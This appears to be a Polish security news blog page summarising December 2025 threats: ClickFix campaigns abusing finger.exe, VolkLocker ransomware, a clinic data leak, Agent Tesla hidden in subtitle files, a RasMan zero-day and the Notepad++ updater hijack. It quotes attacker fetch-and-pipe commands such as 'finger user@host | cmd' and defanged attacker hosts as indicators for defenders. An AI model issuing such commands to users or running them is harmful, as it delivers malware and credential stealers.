Pomagamy Zrozumieć i Wdrażać Bezpieczeństwo
Zaobserwowałeś to pewnie sam: dysk pełen darmowych e-booków o cyberbezpieczeństwie, zakładki do tuzinów blogów i playlist YouTube „na później”. Wszystko dostępne od ręki, bez płacenia ani złotówki. Z taką górą darmowej wiedzy już dawno powinieneś być ekspertem, prawda? A jednak – realny progres umiejętności jakoś nie nadchodzi.
Czytaj dalej „Dlaczego Darmowa Wiedza Nie Działa (Tak Jak Myślisz)”
Fala kampanii ClickFix – socjotechnicznych ataków nakłaniających użytkownika do skopiowania i uruchomienia „naprawczej” komendy w systemie – nie wygasa. Najnowsze obserwacje SANS ISC potwierdzają, że napastnicy nadal nadużywają archaicznego protokołu Finger (TCP/79), uruchamiając na Windows wbudowane finger.exe do pobrania i wykonania zdalnych poleceń lub skryptów. W świeżym dzienniku Brad Duncan pokazuje, że co najmniej dwie aktywne kampanie – KongTuke i SmartApeSG – w grudniu 2025 r. wciąż serwują w fałszywych CAPTCHA komendy wywołujące finger.exe po to, by dostarczyć dalsze payloady (PowerShell/EXE) i kontynuować infekcję.
finger user@host | cmd lub pobiera treść, którą następnie interpretuje cmd/PowerShell. finger.exe nie obsługuje proxy – to ważny warunek skuteczności/neutralizacji w sieciach korporacyjnych. finger gcaptcha@captchaver[.]top) i SmartApeSG (zapytania finger do hostów/IP z fałszywych CAPTCHA). finger.exe, reguły EDR/Sigma na nietypowe uruchomienia finger.exe. O powrocie Finger w ClickFix szerzej pisał BleepingComputer 15 listopada 2025 r., dokumentując próbki, w których polecenia finger ... | cmd pobierały i wykonywały dalszy kod; wskazano też przypadki pobrania archiwum maskującego się jako PDF i finalne wdrożenie NetSupport Manager. Wcześniej Didier Stevens w SANS ISC podsumował właściwości Finger: port 79/TCP i brak obsługi proxy w finger.exe – co tłumaczy, czemu środowiska z proxy explicit są z natury odporne (o ile ruch „na skróty” nie jest dozwolony). Projekty LOLBAS i analizy z lat 2023–2024 opisywały finger.exe jako LOLBIN zdolny do transferu danych (MITRE T1105) oraz potencjalny kanał C2/dostawczy.
Przebieg (obserwacje z 11–13 grudnia 2025 r. na podstawie SANS ISC):
finger.exe do zapytania user@host pod kontrolą atakującego (np. gcaptcha@captchaver[.]top), często z potokiem do cmd (| cmd) lub przekazaniem treści do PowerShell. pmidpils[.]com/yhb.jpg), zapis pod losową nazwą i uruchomienie.finger i proste strumienie tekstowe z komendami.Właściwości Finger istotne dla obrony:
finger.exe bez proxy-awareness. Wymuszenie ruchu przez explicit proxy i deny dla direct-to-Internet zwykle łamie łańcuch. finger.exe to LOLBIN (LOLBAS) – obecny na systemach Windows (System32/SysWOW64). Dostępne reguły Sigma i wskazówki detekcyjne (proces + nietypowe połączenia zewnętrzne).Sieć i kontrola egress
finger.exe bez proxy nie zadziała w takim modelu. Kontrola aplikacji / endpoint
finger.exe (AppLocker/WDAC/SRP) w środowiskach produkcyjnych; to binarka o marginalnym uzasadnieniu biznesowym. Skoreluj z LOLBAS. cmd.exe/powershell.exe → finger.exe, wystąpienie pipe | cmd, nietypowy port 79. Wykorzystaj reguły Sigma dot. finger.exe.Działania IR/łowienie zagrożeń
Świadomość użytkowników
finger.exe – jako element systemu – ułatwia dostarczenie poleceń i payloadów, w tym RAT/stealerów.finger.exe znacząco obniża skuteczność tych łańcuchów. Finger.exe (ścieżki, detections/Sigma). (lolbas-project.github.io)13 grudnia 2025 r. opisano nową usługę RaaS grupy hacktywistycznej CyberVolk o nazwie VolkLocker. Debiut okazał się nieudany z powodu poważnych błędów kryptograficznych, które umożliwiają potencjalne odszyfrowanie danych bez płacenia okupu. Ransomware korzysta z automatyzacji przez Telegram i celuje w systemy Windows oraz Linux.
%TEMP%) może pozwolić ofiarom na darmową dekryptację.CyberVolk pojawił się w 2024 r. jako kolektyw hacktywistyczny łączący DDoS i ransomware. Infrastruktura rekrutacyjna i operacyjna była (i jest) silnie oparta na Telegramie, co obniża barierę wejścia dla „afiliantów”. W 2025 r. grupa wróciła z nowym „produktem” RaaS – VolkLocker – ale popełniła kardynalne błędy projektowe.
%TEMP%, co tworzy „skrót” do deszyfracji.Dla zespołów IR/SOC:
%TEMP%, katalogi robocze malware – szukaj hex-klucza i plików tymczasowych pozostawionych przez VolkLocker. %TEMP%, artefakty procesu).Dla zespołów bezpieczeństwa/IT:
%TEMP%.12 grudnia 2025 r. serwis DataBreaches opisał sprawę możliwego naruszenia bezpieczeństwa danych w Virginia Urology (Richmond, USA). Grupa przestępcza określająca się jako MS13-089 twierdzi, że 9 listopada wykradła 927 GB danych z systemów placówki i rozpoczęła publikację próbek na swojej stronie w darknecie. W udostępnionych zrzutach widać m.in. skierowania, raporty medyczne oraz dane identyfikacyjne pacjentów. Placówka – na moment publikacji – nie skomentowała sprawy publicznie.
MS13-089 to nazwa nawiązująca do starego biuletynu bezpieczeństwa Microsoft MS13-089 (GDI/WordPad RCE z 2013 r.). Przestępcy sami wskazują, że nazwa pochodzi od tego biuletynu i nie ma związku z gangiem MS-13. To zabieg brandingowy, często stosowany przez grupy ransomware/wyciekowe.
Region Richmond (Wirginia) miał już w 2025 r. głośny incydent ochrony zdrowia – Radiology Associates of Richmond ujawniło naruszenie danych ponad 1,4 mln osób. To pokazuje, że ekosystem medyczny w stanie jest istotnym celem cyberprzestępców.
Z udostępnionych próbek wynika, że w systemach Virginia Urology przechowywano i – według przestępców – wykradziono niezaszyfrowane dokumenty zawierające:
Na tę chwilę nie ma publicznych, technicznych szczegółów wektora wejścia (phishing, podatność, nadużycie VPN/MFA itp.). Brak też oficjalnego potwierdzenia zakresu przez placówkę. (Wnioski oparte wyłącznie na materiale DataBreaches i deklaracjach grupy.)
Dla Virginia Urology (i podobnych podmiotów ochrony zdrowia):
Dla pacjentów (praktyka ogólna przy potencjalnym wycieku PHI):
W przeciwieństwie do klasycznych kampanii ransomware, gdzie szyfrowanie paraliżuje operacje, sprawcy MS13-089 deklarują brak szyfrowania i skupienie na exfiltration + extortion (publikacje próbki jako dźwignia). Taki model był już widoczny w 2025 r. w innych incydentach zdrowotnych w USA, m.in. w regionie Richmond (Radiology Associates of Richmond – 1,4 mln osób), choć tam ujawniono incydent oficjalnie i prowadzono notyfikacje.
Nazwa grupy („MS13-089”) najpewniej ma wywoływać techniczny rezonans (asocjacja z krytycznym biuletynem Microsoft), ale nie sugeruje konkretnej podatności użytej w ataku.
Uwaga: część informacji (np. rozmiar i zakres danych) pochodzi z deklaracji sprawców i materiału DataBreaches; do chwili obecnej (14 grudnia 2025 r.) brak oficjalnego potwierdzenia ze strony Virginia Urology oraz wpisu w publicznie widocznym rejestrze HHS OCR.
Badacze Bitdefender ostrzegają przed fałszywym torrentem filmu „One Battle After Another” (z Leonardo DiCaprio), który nie tylko zawiera standardowy pakiet „fałszywych plików”, ale wykorzystuje… plik z napisami .srt do uruchomienia złożonego łańcucha loaderów PowerShell. Ostatecznie ofiara zostaje zainfekowana zdalnym trojanem Agent Tesla (RAT/infostealer). O sprawie informuje też BleepingComputer, podkreślając nietypowe ukrycie kodu uruchamianego z poziomu linii konkretnych wierszy napisów.
CD.lnk, pliki graficzne i napisy Part2.subtitles.srt.CD.lnk wywołuje polecenia, które czytają i wykonują linie 100–103 z .srt, uruchamiając kilka zagnieżdżonych skryptów PowerShell i tworząc ukryte zadanie Harmonogramu Zadań RealtekDiagnostics. .srt i plików JPG/„m2ts”, instalują narzędzia i ładują finalny Agent Tesla w pamięci (fileless). Wykorzystywanie premier filmowych do dystrybucji malware przez torrenty to stary trik, ale Bitdefender ocenia ten przypadek jako szczególnie złożony i „warstwowy”. W przeszłości widziano podobne nadużycia przy innych tytułach (np. dystrybucja Lumma Stealer), co potwierdzają również niezależne analizy branżowe (ESET, Microsoft TI) – popularne infostealery są szeroko monetyzowane w modelu MaaS i często łączone z pirackimi treściami.
Zawartość torrenta
Paczka zawiera m.in.: One Battle After Another.m2ts (w rzeczywistości archiwum), Photo.jpg, Cover.jpg, Part2.subtitles.srt oraz skrót CD.lnk. Kliknięcie skrótu inicjuje cały łańcuch.
Start z pliku .srtCD.lnk uruchamia polecenie CMD, które czyta Part2.subtitles.srt, wybiera linie 100–103 i wykonuje znajdujący się tam kod wsadowy/PowerShell. Następnie skrypt ponownie otwiera .srt, przeskakuje do dalszych wierszy (np. od 5005) i interpretuje kolejne fragmenty jako kod – to nietypowa technika ukrycia w pozornie niewinnym formacie. Technika mieści się w ATT&CK: T1059.001 PowerShell.
Warstwowe droppery i persystencja
Z .srt wydobywane są szyfrowane (AES) bloki danych, które składają pięć skryptów PowerShell do folderu C:\Users\<USER>\AppData\Local\Microsoft\Diagnostics. Następnie tworzony jest ukryty Scheduled Task RealtekDiagnostics (opis „Audio Helper”), uruchamiający RealtekCodec.bat, co odpowiada T1053.005 (Scheduled Task/Job).
„Multimedia” jako archiwa
One Battle After Another.m2ts – służy jako archiwum rozpakowywane z użyciem wbudowanych narzędzi lub WinRAR/7-Zip/Bandizip (LotL).Photo.jpg – zawiera zakodowane bajty kilku plików, dekodowane i zapisywane do katalogu cache diagnostyki dźwięku Windows.Cover.jpg – kolejne „ukryte archiwum” (hasło 1), z którego wypakowywane są pliki wsadowe, skrypty i komponenty (m.in. RealtekAudioService.go). Finalny payload i tryb fileless
Ostatni etap sprawdza stan Microsoft Defendera, doinstalowuje wymagane składniki (np. środowisko Go), a następnie ładuje Agent Tesla w pamięci bez klasycznego zapisu na dysk, utrudniając detekcję. Agent Tesla od lat służy do kradzieży haseł z przeglądarek, klientów pocztowych, FTP/VPN oraz wykonywania zrzutów ekranu i zdalnej kontroli.
Powiązane techniki (ATT&CK):
Dla SOC/IT:
Part2.subtitles.srt, CD.lnk, katalogu ...\Microsoft\WindowsSoundDiagnostics\Cache, nazw z prefiksem Realtek w ścieżkach AppData.-ep Bypass, -windowstyle hidden, -nop. (T1059.001) RealtekDiagnostics / autorun z opisem „Audio Helper”. (T1053.005) ...\Microsoft\Diagnostics, zresetować hasła w przeglądarkach/klientach poczty/VPN i przeprowadzić pełny hunt pod kątem fileless. Dla użytkowników (security awareness):
.lnk, nie klikaj „magicznych” plików startowych – film .m2ts/.mkv nie powinien wymagać skrótu i dodatkowych plików wsadowych. W odróżnieniu od typowych kampanii torrentowych, gdzie złośliwy plik to „fałszywy instalator” lub sam film jest nośnikiem steganografii, tutaj kluczowy kod wykonawczy tkwi w pliku napisów .srt i jest wywoływany poprzez precyzyjne odczytanie wybranych linii. To odróżnia kampanię od wielu obserwowanych ostatnio dystrybucji Lumma Stealer, które częściej bazują na phishingu, fałszywych stronach/„CAPTCHA” lub GitHub/Cloud delivery.
W systemach Windows wykryto nową podatność zero-day w usłudze Remote Access Connection Manager (RasMan). Błąd pozwala nieuprzywilejowanemu lokalnemu użytkownikowi doprowadzić do awaryjnego zakończenia działania usługi (DoS). Luka nie ma jeszcze identyfikatora CVE i nie została załatana przez Microsoft w momencie pisania artykułu. ACROS Security (platforma 0patch) udostępniło darmowe mikrolatki dla szerokiego zakresu wersji Windows, od 7 po 11 oraz od Windows Server 2008 R2 do Server 2025.
W październiku 2025 r. Microsoft załatał w RasMan CVE-2025-59230 (eskalacja uprawnień). ACROS, analizując techniki wyzyskania tej luki, zauważyło, że skuteczny łańcuch ataku wymaga zatrzymania RasMan, aby napastnik mógł podszyć się pod jego punkt RPC. To doprowadziło do wykrycia oddzielnej, niezałatanej podatności DoS, która umożliwia lokalnemu użytkownikowi awaryjne wyłączenie RasMan na żądanie.
Zespół Notepad++ opublikował wersję 8.8.9, która uszczelnia mechanizm aktualizacji WinGUp po incydentach, w których aktualizator pobierał zamiast legalnych instalatorów — złośliwe pliki wykonywalne. Twórcy opisują zjawisko jako „hijacking ruchu” WinGUp, skutkujący przekierowaniem do fałszywych serwerów aktualizacji. W 8.8.9 wprowadzono weryfikację podpisu i certyfikatu pobieranego instalatora; w razie niepowodzenia aktualizacja jest przerywana.
O incydentach poinformowały media branżowe — m.in. BleepingComputer i heise — wskazując, że aktualizator potrafił pobrać i uruchomić podstawiony plik EXE zamiast nowej wersji edytora.
W 2025 r. Notepad++ mierzył się już z innymi kwestiami bezpieczeństwa (np. CVE-2025-49144 w instalatorze oraz zmiany wokół certyfikatu podpisującego), a także z modyfikacjami aktualizatora (aktualizacje cURL w WinGUp). To pokazuje, że łańcuch aktualizacji narzędzia jest aktywnie wzmacniany od kilku wydań.
Równolegle media (The Register, heise) opisywały, że hijacking był już wykorzystywany w praktyce i prowadził do realnych infekcji — stąd pilna publikacja 8.8.9.
WinGUp (znany też jako GUP.exe) to niewielki aktualizator uruchamiany z Notepad++: pobiera metadane aktualizacji i wskazany instalator EXE, zapisuje go tymczasowo i uruchamia. Jeśli ruch HTTP(S) zostanie przechwycony lub przekierowany, aktualizator może otrzymać spreparowany URL/plik. Opis sekwencji żądań i działania (pobranie metadanych, URL do EXE, uruchomienie z %TEMP%) potwierdzają niezależne analizy.
Co zmieniono w 8.8.9?
Get-AuthenticodeSignature .\npp.8.8.9.Installer.x64.exe — status powinien być Valid.Get-FileHash .\npp.8.8.9.Installer.x64.exe -Algorithm SHA256 i porównanie z sumami na GitHub/witrynie projektu.GUP.exe/WinGUp spoza standardowej ścieżki programu,GUP.exe i ogranicz aktualizator do zaufanych domen (GitHub).